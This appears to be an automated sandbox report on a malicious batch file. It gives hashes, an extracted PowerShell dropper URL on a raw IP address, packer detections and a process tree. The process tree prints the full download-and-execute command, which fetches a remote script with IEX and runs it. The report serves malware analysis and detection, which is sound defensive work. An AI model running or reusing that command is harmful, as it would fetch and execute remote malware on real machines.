Analysis
  max time kernel: 144s
  max time network: 94s
  platform: windows10_x64
  resource: win10v200722
  submitted: 04-08-2020 12:18
Static task: static1

Behavioral task: behavioral1
  Sample: 0114183087da12ff757505a2a13eadf3.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 0114183087da12ff757505a2a13eadf3.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 0114183087da12ff757505a2a13eadf3.bat
  Size: 221B
  MD5: 0037a823920b7141736a18b53ea6858f
  SHA1: 6632e28571b04910e97f9305a13b57ea06ff09a4
  SHA256: af6f3062596268dda5ce47e9bf6315f59cfa76b7aaaa809a76f6bdd69b4a6593
  SHA512: 39f35183c367850e5e63b63c1a6dc176498d5a80afb4b5314f8df7ac63f9b50519d76783cbc47e42068d54eee860d14515cbd6619f41c3061b9cde0b76e31a07
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source: ps1.dropper
    URLs: http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3
Signatures

Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes (pid, process):
    612 WerFault.exe (reported 13 times)

ServiceHost packer (5 IoCs)
  Detects ServiceHost packer used for .NET malware
  Processes (resource, yara_rule):
    behavioral2/memory/652-2-0x0000000000000000-mapping.dmp  servicehost
    behavioral2/memory/652-3-0x0000000000000000-mapping.dmp  servicehost
    behavioral2/memory/652-4-0x0000000000000000-mapping.dmp  servicehost
    behavioral2/memory/652-5-0x0000000000000000-mapping.dmp  servicehost
    behavioral2/memory/652-6-0x0000000000000000-mapping.dmp  servicehost

Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description, pid, process, target process):
    PID 2076 wrote to memory of 652  2076  cmd.exe  powershell.exe (reported 3 times)

Program crash (1 IoC)
  Processes (pid, pid_target, process, target process):
    612  652  WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
    Token: SeRestorePrivilege  612  WerFault.exe
    Token: SeBackupPrivilege   612  WerFault.exe
    Token: SeDebugPrivilege    612  WerFault.exe
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0114183087da12ff757505a2a13eadf3.bat"
   PID: 2076
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3');Invoke-LMLCRVJXBWONTA;Start-Sleep -s 10000"
      PID: 652

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 700
         PID: 612
         - Suspicious behavior: EnumeratesProcesses
         - Program crash
         - Suspicious use of AdjustPrivilegeToken